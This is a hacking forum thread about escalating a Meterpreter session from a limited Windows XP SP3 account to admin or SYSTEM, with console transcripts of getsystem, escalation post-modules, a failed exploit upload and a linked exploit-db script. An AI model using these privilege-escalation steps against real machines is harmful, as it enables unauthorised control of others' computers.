Jump to content

Admin/system Level Escalation For Windows Xp Via Meterpreter


bobbyb1980

Recommended Posts

Greetings fellow hackers. I am trying to figure out a way to open a meterpreter shell on a victim machine that is running a Windows XP limited user account. Getsystem and use priv only seem to be working for escalation from Admin to system, but I am trying to go from limited user to admin.

I was using the uacbypass module for windows 7 limited user accounts, but can't find anything similar for XP.

Any ideas?

Link to comment
Share on other sites

To my knowledge getsystem will only get you system level privs if you already have Admin privs, it's not working to escalate a limited user account to Admin/Sys.

You are mostly right in that getsystem will typically get you system level privs, but then you can use incognito or migrate processes to obtain other user rights. However, on XP SP2 getsystem should work from any meterpreter session, at least it always has for me. I wish I could help more, but it sounds like a module is not working quite right for you. Are you running in trunk? Did you do a an msfupdate?

Link to comment
Share on other sites

Hey guys. Looks like only SP2 is vulnerable to this module. I tried several different modules and none of them work in SP3.

Does anyone know a way to elevate a limited user account to either Admin/SYS in SP3?

meterpreter > getuid
Server username: testinglimited\limited
meterpreter > 

meterpreter > run post/windows/escalate/getsystem

[-] Post failed: Rex::Post::Meterpreter::RequestError priv_elevate_getsystem: Operation failed: Access is denied.
[-] Call stack:
[-]   /opt/framework-4.0.0/msf3/lib/rex/post/meterpreter/extensions/priv/priv.rb:68:in `getsystem'
[-]   /opt/framework-4.0.0/msf3/modules/post/windows/escalate/getsystem.rb:59:in `run'

meterpreter > run post/windows/escalate/ms10_092_schelevator

[-] Windows XP (Build 2600, Service Pack 3). is not vulnerable.

Link to comment
Share on other sites

I found this Python script that will respawn a system/admin shell from a XP SP3 limited user account. I already have a meterpreter shell on the box. Goal is to get from limited user to admin/sys.

http://www.exploit-db.com/exploits/18176/

The problem is, that I can't upload files via a meterpreter limited access shell.

meterpreter > upload /tmp/ms11_080.py C:\\
[*] uploading  : /tmp/ms11_080.py -> C:\
[-] core_channel_open: Operation failed: Access is denied.

Any ideas?

Link to comment
Share on other sites

Don't know what else to tell you.

I just fired up XP SP3 (I also know these work in SP2), ran the aurora exploit against it (ms10_002_aurora):

meterpreter > getuid

Server username: computer\user

meterpreter > getsystem

...got system (via technique 4).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

Then I tried your method, using the module getsystem.rb explicitly and same thing more or less.

meterpreter > getuid

Server username: computer\user

meterpreter > run post/windows/escalate/getsystem

[+] Obtained SYSTEM via technique 4

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

Which exploit are you using? Which payload?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...